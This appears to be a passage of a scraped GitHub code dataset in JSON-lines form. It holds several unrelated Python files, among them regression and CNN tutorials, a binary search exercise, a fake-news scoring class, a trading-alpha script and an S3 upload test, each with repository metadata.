test.fit(data_features,data_labels)\n# np.set_printoptions(precision=3)\n# print(fit.scores_)\n# features = fit.transform(data_features)\n# print(features[0:10])\n\n#min_max\n\nscaler = MinMaxScaler()\nscaler.fit(data_features)\nfeatures = scaler.fit_transform(data_features)\n\n#standard\nscaler = StandardScaler()\nfeatures = scaler.fit_transform(data_features)\n\n\nX_train, X_test, Y_train, Y_test = train_test_split(features, data_labels, test_size=0.3)\n#decision tree \n\nclf = DecisionTreeRegressor(max_depth=5,max_features=1)\n\nclf.fit(X_train,Y_train)\n\nscore = clf.score(X_test,Y_test)\n\nprint(score)\n\ny_pred = clf.predict(X_test)\n\n\n\nnames = [\"Decision Tree Regressor\", \"MLP Regressor\", \"Random Forest Regressor\", \"AdaBoost\", \"Bagging Regressor\",\"Extra Trees Regressor\"]\n\nclassifiers = [\n DecisionTreeRegressor(max_depth=5,max_features=1),\n MLPRegressor(alpha=1,max_iter=200,power_t=0.9,batch_size=50),\n RandomForestRegressor(max_depth=5, max_features=1, n_estimators=10),\n AdaBoostRegressor(n_estimators=10),\n BaggingRegressor(max_features=1,n_estimators=10,base_estimator=clf),\n ExtraTreesRegressor(max_depth=5)\n]\n\nfor name, clf in zip(names, classifiers):\n clf.fit(X_train,Y_train)\n score = clf.score(X_test,Y_test)\n y_pred = clf.predict(X_test)\n print(name+\": \"+str(score))\n mse = mean_squared_log_error(Y_test,y_pred)\n print('MSE: %.4f' % mse)\n # print(confusion_matrix(Y_test,y_pred,labels=None))\n # print(cohen_kappa_score(Y_test,y_pred, labels=None))\n # print(classification_report(Y_test,y_pred,labels=None))","repo_name":"Chriscalde/EvidenciasCursoAIULSA2019_4501","sub_path":"tmdb-box-office-prediction/boxoffice.py","file_name":"boxoffice.py","file_ext":"py","file_size_in_byte":5826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14233113280","text":"# Uses python3\nimport sys\n\ndef binary_search(a, x):\n left = 0\n right = len(a) - 1\n\n def search(left, right, a, x):\n n = right - left\n\n if n == 0:\n return left if a[left] == x else -1 \n\n mid = left + n//2\n\n if a[mid] >= x:\n return search(left, mid, a, x)\n else:\n return search(mid + 1, right, a, x)\n\n return search(left, right, a, x)\n\n\ndef linear_search(a, x):\n for i in range(len(a)):\n if a[i] == x:\n return i\n return -1\n\nif __name__ == '__main__':\n input = sys.stdin.read()\n data = list(map(int, input.split()))\n n = data[0]\n m = data[n + 1]\n a = data[1 : n + 1]\n for x in data[n + 2:]:\n # replace with the call to binary_search when implemented\n #print(linear_search(a, x), end = ' ')\n print(binary_search(a, x), end = ' ')\n","repo_name":"mcgaw/psychic-garbanzo","sub_path":"1/week4/binary_search/binary_search.py","file_name":"binary_search.py","file_ext":"py","file_size_in_byte":869,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74029995252","text":"from datetime import datetime\nfrom logging import getLogger\n\nfrom mr_owlf_mls.repository.author import AuthorRepository\nfrom mr_owlf_mls.repository.domain import DomainRepository\nfrom mr_owlf_mls.service.translator import translate\nfrom mr_owlf_mls.util.data import clean\nfrom pandas import DataFrame\nfrom pymongo.database import Database\n\nFAKE = 'FAKE'\nNOT_FAKE = 'NOT_FAKE'\n\n\nclass Process:\n \"\"\"\n This class is responsible to calculate your data score.\n \"\"\"\n\n def __init__(self, clf: any, vectorizer: any, db: Database):\n \"\"\"\n Default constructor.\n :param clf: Classifier\n :param 
vectorizer: Vectorizer\n :param db: Database Connection Instance\n \"\"\"\n self.log = getLogger('root')\n self.clf = clf\n self.vectorizer = vectorizer\n self.author_repository = AuthorRepository(db)\n self.domain_repository = DomainRepository(db)\n\n def run(self, **kwargs) -> float:\n \"\"\"\n Calculate news score.\n If no arguments are passed it will return \"0.0\" as score.\n :param kwargs: Optional arguments to calculate data score.\n sentence (str): News sentence\n author (str): Author(s) name(s)\n domain (str): News domain\n publish_date (str): The UTC date that it was published [YYYY-MM-DD]\n :return: Score\n \"\"\"\n self.log.info(f'SCORE # Calculating score...')\n score = 0.0\n if len(kwargs) == 0:\n return score\n\n if 'sentence' in kwargs:\n score = score + (self.sentence_score(kwargs.get('sentence')) * 6.5)\n\n if 'author' in kwargs:\n score = score + (self.author_score(kwargs.get('author')) * 1.25)\n\n if 'domain' in kwargs:\n score = score + (self.domain_score(kwargs.get('domain')) * 1.25)\n\n if 'publish_date' in kwargs:\n score = score + (self.publish_date_score(kwargs.get('publish_date')) * 1.0)\n\n score = float(score / 10)\n self.log.info(f'SCORE # \"{score}\"\\n')\n return score\n\n def sentence_score(self, sentence: str) -> float:\n if sentence is None or sentence.strip() == '':\n return 0.0\n\n data = DataFrame({'content': [clean(translate(sentence))]})\n data_cvec = self.vectorizer.transform(data['content'])\n preds_prob = self.clf.predict_proba(data_cvec)\n\n fake = '{0:.2f}'.format(preds_prob[0][0])\n not_fake = '{0:.2f}'.format(preds_prob[0][1])\n self.log.info(f'SENTENCE # Prob. to be true \"{not_fake}\" (false \"{fake}\")')\n\n return float(preds_prob[0][1])\n\n def author_score(self, author_name: str) -> float:\n if author_name is None or author_name.strip() == '':\n return 0.0\n\n author = self.author_repository.find(author_name.lower().strip())\n if author is None or 'classification' not in author:\n return 0.0\n\n clf = author['classification']\n good = int(clf[NOT_FAKE]) if NOT_FAKE in clf else 0\n bad = int(clf[FAKE]) if FAKE in clf else 0\n total = good + bad\n score = 5.0 if total == 0 else float(good / total)\n\n self.log.info(f'AUTHOR # \"{author_name}\" score is \"{score}\"')\n return score\n\n def domain_score(self, domain_name: str) -> float:\n if domain_name is None or domain_name.strip() == '':\n return 0.0\n\n domain = self.domain_repository.find(domain_name.lower().strip())\n if domain is None or 'classification' not in domain:\n return 0.0\n\n clf = domain['classification']\n good = int(clf[NOT_FAKE]) if NOT_FAKE in clf else 0\n bad = int(clf[FAKE]) if FAKE in clf else 0\n total = good + bad\n score = 5.0 if total == 0 else float(good / total)\n\n self.log.info(f'DOMAIN # \"{domain_name}\" score is \"{score}\"')\n return score\n\n def publish_date_score(self, publish_date: str) -> float:\n if publish_date is None or publish_date.strip() == '':\n return 0.0\n\n score = -1.0\n try:\n date = datetime.strptime(publish_date, '%Y-%m-%d').date()\n now = datetime.date(datetime.utcnow())\n if date < now:\n score = 1.0\n except ValueError as ex:\n self.log.warning(f'PUBLISH DATE # \"{publish_date}\" is not a valid date! 
Message: {ex}')\n\n self.log.info(f'PUBLISH DATE # \"{publish_date}\" score is \"{score}\"')\n return score\n","repo_name":"avcaliani/mr-owlf","sub_path":"mr-owlf-mls/mr_owlf_mls/service/process.py","file_name":"process.py","file_ext":"py","file_size_in_byte":4509,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"14219918830","text":"\nimport yaml\nimport numpy as np\nimport tensorflow as tf\nimport keras\nfrom keras import layers\nfrom keras.layers import Conv2D, Input, MaxPooling2D\nfrom keras.layers import Bidirectional, LSTM, Dense\nfrom keras.layers import BatchNormalization, Bidirectional, Activation, Dropout, Reshape, Lambda\nfrom keras.models import Model\nfrom keras.utils import plot_model\nfrom keras import backend as K \n\nconfig_path = \"./conf/conf.yaml\"\n\ndef ctc_lambda_func(args):\n y_pred, labels, input_length, label_length = args\n # the 2 is critical here since the first couple outputs of the RNN\n # tend to be garbage:\n y_pred = y_pred[2:, :]\n return K.ctc_batch_cost(labels, y_pred, input_length, label_length)\n\nclass CRNN:\n\n def __init__(self, input_shapes, class_num=37):\n \n self.config = self.get_Config()\n self.input_shapes = input_shapes\n self.class_num = class_num\n self.CNN_layer = self.make_CNN()\n self.RNN_layer = self.make_RNN()\n self.CRNN_model = self.create_model()\n\n def get_Config(self):\n with open(config_path, \"r\") as stream:\n conf = yaml.load(stream, Loader=yaml.FullLoader)\n return conf[\"model\"]\n\n # create CNN\n def make_CNN(self):\n CNN_CONFIG = self.config[\"CNN\"]\n #print(CNN_CONFIG)\n \n layers = [\"L1\", \"L2\", \"M\", \"L3\", \"L4\", \"C\", \"L5\", \"L6\", \"L7\", \"C\", \"L8\", \"L9\", \"C\", \"M\", \"L10\", \"L11\", \"L12\", \"M\"]\n \n input_shapes = self.input_shapes\n inputs = Input(shape=input_shapes, name=\"CNN_inputs\")\n\n inner = Conv2D(filters=CNN_CONFIG[\"L1\"][\"filters\"], kernel_size=(CNN_CONFIG[\"L1\"][\"kernels\"], CNN_CONFIG[\"L1\"][\"kernels\"]),\n padding=CNN_CONFIG[\"L1\"][\"padding\"])(inputs)\n inner = BatchNormalization()(inner)\n inner = Activation(CNN_CONFIG[\"L1\"][\"activation\"])(inner)\n\n for _, layer in enumerate(layers[1:], 1):\n if layer == \"M\":\n inner = MaxPooling2D(pool_size=(2, 2), strides=2)(inner)\n elif layer == \"C\":\n inner = MaxPooling2D(pool_size=(2, 2), strides=(2, 1))(inner)\n else:\n inner = Conv2D(filters=CNN_CONFIG[layer][\"filters\"], kernel_size=(CNN_CONFIG[layer][\"kernels\"], CNN_CONFIG[layer][\"kernels\"]),\n padding=CNN_CONFIG[layer][\"padding\"])(inner)\n inner = BatchNormalization()(inner)\n inner = Activation(CNN_CONFIG[layer][\"activation\"])(inner)\n\n model = Model(inputs, inner)\n #plot_model(model, to_file='CNN.png', show_shapes=True)\n return model\n\n def make_RNN(self):\n input_shapes = K.int_shape(self.CNN_layer.layers[-1].output)\n input_shapes = input_shapes[2:]\n #print(\"RNN input shapes = \", input_shapes)\n\n inputs = Input(shape=input_shapes, name=\"RNN_input\")\n inner = Bidirectional(LSTM(units=128, return_sequences=True, dropout=0.3))(inputs)\n inner = Bidirectional(LSTM(units=64, return_sequences=True, dropout=0.3))(inner)\n inner = Dropout(rate=0.25)(inner)\n inner = Dense(units=self.class_num)(inner)\n outputs = Activation('softmax')(inner)\n\n model = Model(inputs, outputs)\n #plot_model(model, to_file='RNN.png', show_shapes=True)\n return model\n\n def create_model(self):\n inputs = Input(shape=self.input_shapes, name='CRNN_input')\n\n x = inputs\n for i in range(1, 
len(self.CNN_layer.layers)):\n x = self.CNN_layer.layers[i](x)\n rnn_input_shapes = np.shape(x)[2:]\n x = Reshape((rnn_input_shapes[0], rnn_input_shapes[1]))(x)\n for j in range(1, len(self.RNN_layer.layers)):\n x = self.RNN_layer.layers[j](x)\n \n outputs = x\n\n labels = Input(shape=(4, 37), name=\"label\", dtype=\"float32\")\n input_length = Input(name='input_length', shape=[1], dtype='int64')\n label_length = Input(name='label_length', shape=[1], dtype='int64')\n\n loss_out = Lambda(ctc_lambda_func, output_shape=(1,), name='ctc')([outputs, labels, input_length, label_length])\n \n crnn_model = Model([inputs, labels, input_length, label_length], loss_out)\n \n plot_model(crnn_model, to_file='CRNN.png', show_shapes=True)\n\n return crnn_model\n\n\n\"\"\" for test \"\"\"\n\"\"\"\ninput_shapes = (64, 128, 3)\nmodel = CRNN(input_shapes).CRNN_model\nmodel.summary()\n\"\"\"\n\n","repo_name":"Huang-Ray/OCR-KERAS","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4401,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"12759816251","text":"class Solution:\n def bob_helper(self, cur_arrows, cur_index, ans):\n if cur_index == len(self.aliceArrows):\n if cur_arrows > 0:\n ans[1][0] += cur_arrows\n return ans\n \n score, res_arr = ans[0], ans[1].copy()\n res = self.bob_helper(cur_arrows, cur_index+1, (score, res_arr) )\n \n \n arrow_cost = self.aliceArrows[cur_index] + 1\n new_arrow = cur_arrows - arrow_cost\n \n if new_arrow >= 0: \n \n score, res_arr = ans[0], ans[1].copy()\n score += cur_index\n res_arr[cur_index] = arrow_cost \n \n res_taken = self.bob_helper(new_arrow, cur_index+1,(score, res_arr) )\n \n res = res if res[0] > res_taken[0] else res_taken\n \n return res \n \n def maximumBobPoints(self, numArrows: int, aliceArrows: List[int]) -> List[int]:\n \n self.aliceArrows = aliceArrows\n ans = ( 0, [0]*len(aliceArrows) )\n res = self.bob_helper(numArrows, 0, ans)\n \n return res[1]\n","repo_name":"YohansHailu/competitive_programming","sub_path":"daynamic_programing/Maximum_Points_in_an_Archery_Competition.py","file_name":"Maximum_Points_in_an_Archery_Competition.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"41805209610","text":"import pandas as pd\n\n\ndef make_spectrum():\n \"\"\"Make an artificial spectrum using the lines from NIST\n \"\"\"\n # Load the list of peaks\n df = pd.read_csv('persistent_lines.csv')\n\n print(df.head())\n\n\nif __name__ == \"__main__\":\n make_spectrum()\n","repo_name":"piovere/backprop","sub_path":"data/atoms/spectra.py","file_name":"spectra.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"22702067095","text":"colls = int(input(\"Enter the number of columns: \"))\nprint(f\"Number of elements == {colls*2}\")\nfirtststring = [] # −1 2 5 10 20\nsecondstring = [] # 0.1 0.2 0.3 0.3 0.1\nMathematicalExpectation = []\nSquaredFirstString = []\nDispercyMultiplier = []\ndef Frac(i):\n try:\n return float(i)\n except ValueError:\n n, d = i.split('/')\n return float(n)/float(d)\nfor i in range(0, colls):\n firtststring.insert(i, Frac(input(\"1 : \")))\nfor i in range(0, colls):\n secondstring.insert(i, Frac(input(\"2 : \")))\nprint()\nprint(\"=\"*30)\nprint()\nfor i in range(0, len(firtststring)):\n print(f\" : {firtststring[i]} * {secondstring[i]} = {firtststring[i]*secondstring[i]}\")\n MathematicalExpectation.insert(i, float(firtststring[i]*secondstring[i]))\nMathematicalExpectation = sum(MathematicalExpectation)\nprint()\nprint(f\"Mathematical expectation == {MathematicalExpectation}\")\nprint()\nfor i in range(0, colls):\n print(f\" : {firtststring[i]}^2 * {secondstring[i]} = {firtststring[i]**2 * secondstring[i]}\")\n SquaredFirstString.insert(i, firtststring[i]**2 * secondstring[i])\nSquaredFirstString = sum(SquaredFirstString)\nprint()\nprint(f\" : {SquaredFirstString} - {MathematicalExpectation}^2 == {SquaredFirstString - MathematicalExpectation**2}\")\nprint()\nprint(f\"Squared mathematical expectation == {SquaredFirstString}\")\nprint(f\"Variance == {SquaredFirstString - MathematicalExpectation**2}\")","repo_name":"L0w1y/DispersionAndMathExpectationSearcher","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1493,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
+{"seq_id":"21736486127","text":"'''\nLink to dataset used in the task: https://www.cs.toronto.edu/~kriz/cifar.html\n\nSetup instructions:\n1. Import/Install all the required libraries from Step1 (if they are highlighted with red colour, they should\nstill work after they are installed)\n2. Run the program\nSzymon Kuczyński s22466\n'''\n\nimport tensorflow as tf\nfrom tensorflow.keras.datasets import cifar10\nfrom tensorflow.keras.models import Sequential\nfrom tensorflow.keras.layers import Conv2D, MaxPooling2D, Flatten, Dense, Dropout\nfrom sklearn.metrics import confusion_matrix\nimport matplotlib.pyplot as plt\nimport numpy as np\n\n'''Load CIFAR-10 Dataset: Loads the CIFAR-10 dataset using cifar10.load_data() function and assigns training and \ntesting images along with their respective labels to variables train_images, train_labels, test_images, and test_labels.'''\n(train_images, train_labels), (test_images, test_labels) = cifar10.load_data()\n\n'''Normalize Pixel Values: Scales pixel values in the images to a range between 0 and 1 by dividing train_images \nand test_images by 255.0.'''\ntrain_images, test_images = train_images / 255.0, test_images / 255.0\n\n'''Initialize Sequential Model: Creates a sequential model using Keras, which allows linear stacking of layers.\nAdd Convolutional Layers: Adds convolutional layers (Conv2D) with specific parameters:\nFirst convolutional layer: 32 filters of size (3, 3) using ReLU activation, accepting input images of shape (32, 32, 3) \n(height, width, channels).\nFirst max-pooling layer (MaxPooling2D) with a pool size of (2, 2).\nSecond convolutional layer: 64 filters of size (3, 3) using ReLU activation.\nSecond max-pooling layer with a pool size of (2, 2).\nThird convolutional layer: 64 filters of size (3, 3) using ReLU activation.\nFlatten and Dense Layers: Flattens the output from the convolutional layers into a 1D array and adds dense layers \n(Dense) with specific activations:\nDense layer with 64 neurons using ReLU activation.\nDropout layer (Dropout) with a dropout rate of 0.5 to prevent overfitting.\nOutput dense layer with 10 neurons using the softmax activation for multi-class classification (CIFAR-10 has 10 classes).'''\nmodel = Sequential([\n Conv2D(32, (3, 3), activation='relu', input_shape=(32, 32, 3)),\n MaxPooling2D((2, 2)),\n Conv2D(64, (3, 3), activation='relu'),\n MaxPooling2D((2, 2)),\n Conv2D(64, (3, 3), activation='relu'),\n Flatten(),\n Dense(64, activation='relu'),\n Dropout(0.5),\n Dense(10, activation='softmax')\n])\n\n'''Compile the 
Model: Configures the model for training by specifying the optimizer, loss function, and evaluation metrics:\nOptimizer: 'adam', an efficient gradient descent optimization algorithm.\nLoss function: 'sparse_categorical_crossentropy' suitable for multi-class classification tasks.\nMetrics to track during training: 'accuracy'.'''\nmodel.compile(optimizer='adam',\n loss='sparse_categorical_crossentropy',\n metrics=['accuracy'])\n\n'''Train the Model: Fits the model to the training data (train_images, train_labels) for 10 epochs. \nAlso validates the model's performance using the test data during training (validation_data=(test_images, test_labels)).'''\nhistory = model.fit(train_images, train_labels, epochs=10, validation_data=(test_images, test_labels))\n\n'''Evaluate the Model: Calculates the loss and accuracy of the trained model on the test dataset using model.evaluate().'''\ntest_loss, test_accuracy = model.evaluate(test_images, test_labels)\n\n'''Calculate Predictions: Generates predictions using the trained model on the test images and obtains the class \nlabels with the highest probability using np.argmax() along the last axis.'''\npredictions = np.argmax(model.predict(test_images), axis=-1)\n\n'''Generate Confusion Matrix: Computes the confusion matrix using confusion_matrix from Scikit-learn, \ncomparing test_labels with predictions.'''\nconf_matrix = confusion_matrix(test_labels, predictions)\n\n'''Plot Confusion Matrix: Displays the confusion matrix using plt.imshow() to visualize the model's performance in \nclassifying different categories.'''\nplt.figure(figsize=(8, 6))\nplt.imshow(conf_matrix, cmap=plt.cm.Blues)\nplt.title('Confusion Matrix')\nplt.colorbar()\nplt.xlabel('Predicted Labels')\nplt.ylabel('True Labels')\nplt.show()\n\n'''Print Evaluation Metrics: Outputs the test accuracy obtained from model.evaluate().'''\nprint(f'Test accuracy: {test_accuracy}')","repo_name":"Szykuc2001/NAI_Labs","sub_path":"Lab5/Task2.py","file_name":"Task2.py","file_ext":"py","file_size_in_byte":4394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9115431145","text":"#!/usr/bin/env python \n\nfrom __future__ import print_function\nfrom regress import *\nfrom loaddata import *\nfrom util import *\n\ndef wavg(group):\n b = group['pbeta']\n d = group['overnight_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\ndef wavg2(group):\n b = group['pbeta']\n d = group['overnight_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\ndef wavg3(group):\n b = group['pbeta']\n d = group['cur_log_ret']\n w = group['mkt_cap_y'] / 1e6\n res = b * ((d * w).sum() / w.sum())\n return res\n\n\ndef calc_c2o_daily(daily_df, horizon):\n print(\"Caculating daily c2o...\")\n result_df = filter_expandable(daily_df)\n\n print(\"Calculating c2o0...\")\n# result_df['c2o0'] = result_df['overnight_log_ret'] / result_df['pbeta']\n result_df['bret'] = result_df[['overnight_log_ret', 'pbeta', 'mkt_cap_y', 'gdate']].groupby('gdate').apply(wavg).reset_index(level=0)['pbeta']\n result_df['badjret'] = result_df['overnight_log_ret'] - result_df['bret']\n\n # result_df['c2o0_B'] = result_df['log_ret'] * (1 + np.abs(result_df['badjret'])) ** 3\n result_df['c2o0'] = result_df['badjret']\n result_df.ix[ np.abs(result_df['c2o0']) < .02 , 'c2o0'] = 0\n result_df['c2o0_B'] = winsorize_by_date(result_df['c2o0'])\n\n result_df = result_df.dropna(subset=['c2o0_B'])\n\n demean = lambda x: (x - 
x.mean())\n indgroups = result_df[['c2o0_B', 'gdate', 'ind1']].groupby(['gdate', 'ind1'], sort=False).transform(demean)\n result_df['c2o0_B_ma'] = indgroups['c2o0_B']\n \n print(\"Calulating lags...\")\n for lag in range(1,horizon+1):\n shift_df = result_df.unstack().shift(lag).stack()\n result_df['c2o' + str(lag) + '_B_ma'] = shift_df['c2o0_B_ma']\n \n return result_df\n\ndef calc_c2o_intra(intra_df):\n print(\"Calculating c2o intra...\")\n result_df = filter_expandable(intra_df)\n\n print(\"Calulating c2oC...\")\n result_df['cur_log_ret'] = np.log(result_df['iclose']/result_df['dopen'])\n result_df['bretC'] = result_df[['cur_log_ret', 'pbeta', 'mkt_cap_y', 'giclose_ts']].groupby(['giclose_ts'], sort=False).apply(wavg3).reset_index(level=0)['pbeta']\n result_df['badjretC'] = result_df['cur_log_ret'] - result_df['bretC']\n\n result_df['bret'] = result_df[['overnight_log_ret', 'pbeta', 'mkt_cap_y', 'giclose_ts']].groupby(['giclose_ts'], sort=False).apply(wavg2).reset_index(level=0)['pbeta']\n result_df['badjret'] = result_df['overnight_log_ret'] - result_df['bret']\n\n# result_df['c2oC_B'] = result_df['badjretC'] * (1 + np.abs(result_df['badjret'])) ** 3 \n result_df['c2oC'] = result_df['badjret']\n result_df.ix[ np.abs(result_df['c2oC']) < .02 , 'c2oC'] = 0\n result_df['c2oC_B'] = winsorize_by_ts(result_df['c2oC'])\n result_df = result_df.dropna(subset=['c2oC_B'])\n\n print(\"Calulating c2oC_ma...\")\n demean = lambda x: (x - x.mean())\n indgroups = result_df[['c2oC_B', 'giclose_ts', 'ind1']].groupby(['giclose_ts', 'ind1'], sort=False).transform(demean)\n result_df['c2oC_B_ma'] = indgroups['c2oC_B']\n\n return result_df\n\ndef c2o_fits(daily_df, intra_df, horizon, name, middate):\n # daily_df['dow'] = daily_df['gdate'].apply(lambda x: x.weekday())\n # daily_df['dow'] = daily_df['dow'].clip(0,1)\n # intra_df['dow'] = intra_df['date'].apply(lambda x: x.weekday())\n # intra_df['dow'] = intra_df['dow'].clip(0,1)\n insample_intra_df = intra_df\n insample_daily_df = daily_df\n outsample_intra_df = intra_df\n if middate is not None:\n insample_intra_df = intra_df[ intra_df['date'] < middate ]\n insample_daily_df = daily_df[ daily_df.index.get_level_values('date') < middate ]\n outsample_intra_df = intra_df[ intra_df['date'] >= middate ]\n\n outsample_intra_df['c2o'] = 0\n outsample_intra_df[ 'c2oC_B_ma_coef' ] = np.nan\n for lag in range(1, horizon+1):\n outsample_intra_df[ 'c2o' + str(lag) + '_B_ma_coef' ] = np.nan\n\n fits_df = pd.DataFrame(columns=['horizon', 'coef', 'indep', 'tstat', 'nobs', 'stderr'])\n\n fitresults_df = regress_alpha(insample_intra_df, 'c2oC_B_ma', horizon, True, 'intra_eod')\n fits_df = fits_df.append(fitresults_df, ignore_index=True)\n plot_fit(fits_df, \"c2o_intra_\"+name+\"_\" + df_dates(insample_intra_df))\n fits_df.set_index(keys=['indep', 'horizon'], inplace=True) \n \n unstacked = outsample_intra_df[ ['ticker'] ].unstack()\n coefs = dict()\n coefs[1] = unstacked.between_time('09:30', '10:31').stack().index\n coefs[2] = unstacked.between_time('10:30', '11:31').stack().index\n coefs[3] = unstacked.between_time('11:30', '12:31').stack().index\n coefs[4] = unstacked.between_time('12:30', '13:31').stack().index\n coefs[5] = unstacked.between_time('13:30', '14:31').stack().index\n coefs[6] = unstacked.between_time('14:30', '16:01').stack().index\n unstacked = None\n\n for ii in range(1,7):\n outsample_intra_df.ix[ coefs[ii], 'c2oC_B_ma_coef' ] = fits_df.ix['c2oC_B_ma'].ix[ii].ix['coef']\n\n #DAILY...\n fits_df = pd.DataFrame(columns=['horizon', 'coef', 'indep', 'tstat', 
'nobs', 'stderr'])\n for lag in range(1,horizon+1):\n print(insample_daily_df.head())\n fitresults_df = regress_alpha(insample_daily_df, 'c2o0_B_ma', lag, True, 'daily') \n fits_df = fits_df.append(fitresults_df, ignore_index=True) \n plot_fit(fits_df, \"c2o_daily_\"+name+\"_\" + df_dates(insample_daily_df))\n fits_df.set_index(keys=['indep', 'horizon'], inplace=True) \n\n # for dow in range(0,2): \n # coef0 = fits_df.ix['c2o0_B_ma'].ix[horizon * 10 + dow].ix['coef']\n # for lag in range(1,horizon):\n # coef = coef0 - fits_df.ix['c2o0_B_ma'].ix[lag * 10 + dow].ix['coef'] \n # print \"Coef{}: {}\".format(lag, coef)\n # dowidx = outsample_intra_df[ outsample_intra_df['dow'] == dow ].index\n # outsample_intra_df.ix[ dowidx, 'c2o'+str(lag)+'_B_ma_coef' ] = coef\n\n coef0 = fits_df.ix['c2o0_B_ma'].ix[horizon].ix['coef']\n for lag in range(1,horizon):\n coef = coef0 - fits_df.ix['c2o0_B_ma'].ix[lag].ix['coef'] \n print(\"Coef{}: {}\".format(lag, coef))\n outsample_intra_df[ 'c2o'+str(lag)+'_B_ma_coef' ] = coef\n\n outsample_intra_df[ 'c2o'] = outsample_intra_df['c2oC_B_ma'] * outsample_intra_df['c2oC_B_ma_coef']\n for lag in range(1,horizon):\n outsample_intra_df[ 'c2o'] += outsample_intra_df['c2o'+str(lag)+'_B_ma'] * outsample_intra_df['c2o'+str(lag)+'_B_ma_coef']\n\n return outsample_intra_df\n\ndef calc_c2o_forecast(daily_df, intra_df, horizon, middate):\n daily_results_df = calc_c2o_daily(daily_df, horizon) \n forwards_df = calc_forward_returns(daily_df, horizon) \n daily_results_df = pd.concat( [daily_results_df, forwards_df], axis=1)\n intra_results_df = calc_c2o_intra(intra_df)\n intra_results_df = merge_intra_data(daily_results_df, intra_results_df)\n\n # sector_name = 'Energy'\n # print \"Running c2o for sector {}\".format(sector_name)\n # sector_df = daily_results_df[ daily_results_df['sector_name'] == sector_name ]\n # sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] == sector_name ]\n\n results = list()\n for sector_name in daily_results_df['sector_name'].dropna().unique():\n print(\"Running c2o for sector {}\".format(sector_name))\n sector_df = daily_results_df[ daily_results_df['sector_name'] == sector_name ]\n sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] == sector_name ]\n result_df = c2o_fits(sector_df, sector_intra_results_df, horizon, sector_name, middate)\n results.append(result_df)\n\n # sector_df = daily_results_df[ daily_results_df['sector_name'] != sector_name ]\n # sector_intra_results_df = intra_results_df[ intra_results_df['sector_name'] != sector_name ]\n # result2_df = c2o_fits(sector_df, sector_intra_results_df, horizon, \"ex\", middate)\n \n result_df = pd.concat(results, verify_integrity=True)\n return result_df\n\nif __name__==\"__main__\": \n parser = argparse.ArgumentParser(description='G')\n parser.add_argument(\"--start\",action=\"store\",dest=\"start\",default=None)\n parser.add_argument(\"--end\",action=\"store\",dest=\"end\",default=None)\n parser.add_argument(\"--mid\",action=\"store\",dest=\"mid\",default=None)\n parser.add_argument(\"--horizon\",action=\"store\",dest=\"horizon\",default=1)\n parser.add_argument(\"--freq\",action=\"store\",dest=\"freq\",default='15Min')\n args = parser.parse_args()\n \n start = args.start\n end = args.end\n lookback = 30\n freq = args.freq\n horizon = int(args.horizon)\n pname = \"./c2o\" + start + \".\" + end\n start = dateparser.parse(start)\n end = dateparser.parse(end)\n middate = dateparser.parse(args.mid)\n\n loaded = False\n try:\n daily_df = 
pd.read_hdf(pname+\"_daily.h5\", 'table')\n intra_df = pd.read_hdf(pname+\"_intra.h5\", 'table')\n loaded = True\n except:\n print(\"Did not load cached data...\")\n\n if not loaded:\n uni_df = get_uni(start, end, lookback)\n BARRA_COLS = ['ind1', 'pbeta']\n barra_df = load_barra(uni_df, start, end, BARRA_COLS)\n PRICE_COLS = ['close', 'overnight_log_ret', 'tradable_volume', 'tradable_med_volume_21']\n price_df = load_prices(uni_df, start, end, PRICE_COLS)\n daily_df = merge_barra_data(price_df, barra_df)\n DBAR_COLS = ['close', 'dopen', 'dvolume']\n daybar_df = load_daybars(price_df[ ['ticker'] ], start, end, DBAR_COLS, freq)\n intra_df = merge_intra_data(daily_df, daybar_df)\n daily_df.to_hdf(pname+\"_daily.h5\", 'table', complib='zlib')\n intra_df.to_hdf(pname+\"_intra.h5\", 'table', complib='zlib')\n\n outsample_df = calc_c2o_forecast(daily_df, intra_df, horizon, middate)\n dump_alpha(outsample_df, 'c2o')\n# dump_all(outsample_df)\n","repo_name":"timothyyu/ml_monorepo","sub_path":"statarb/to_convert/c2o.py","file_name":"c2o.py","file_ext":"py","file_size_in_byte":9858,"program_lang":"python","lang":"en","doc_type":"code","stars":59,"dataset":"github-code","pt":"21"} +{"seq_id":"37453569707","text":"import boto3\nimport botocore\nfilename = 'src.zip'\nbucket_name = 'matterhart-test'\ns3_resource = boto3.resource('s3')\nfor bucket in s3_resource.buckets.all():\n print(bucket.name)\ndata = open(filename, 'rb')\ns3_resource.Bucket(bucket_name).put_object(Key=filename, Body=data)\n\n# try:\n# s3_resource.Bucket(bucket_name).download_file(filename, 'dbtable_posts2.p')\n# except botocore.exceptions.ClientError as e:\n# if e.response['Error']['Code'] == \"404\":\n# print(\"The object does not exist.\")\n# else:\n# raise\n\n#%%","repo_name":"joelchan/code","sub_path":"conservex/src/botoTest.py","file_name":"botoTest.py","file_ext":"py","file_size_in_byte":539,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9697251423","text":"import statsmodels.api as sm\r\nimport numpy as np\r\nimport pandas as pd\r\nimport scipy.stats as stats\r\n\r\nvar_table = pd.read_excel(\"GSE39582_var_table.xlsx\")\r\nmatrix_table = pd.read_excel(\"GSE39582_series_matrix_table.xlsx\", index_col=\"ID_REF\")\r\n#matrix_table = matrix_table.iloc[:, :566]\r\ngpl = 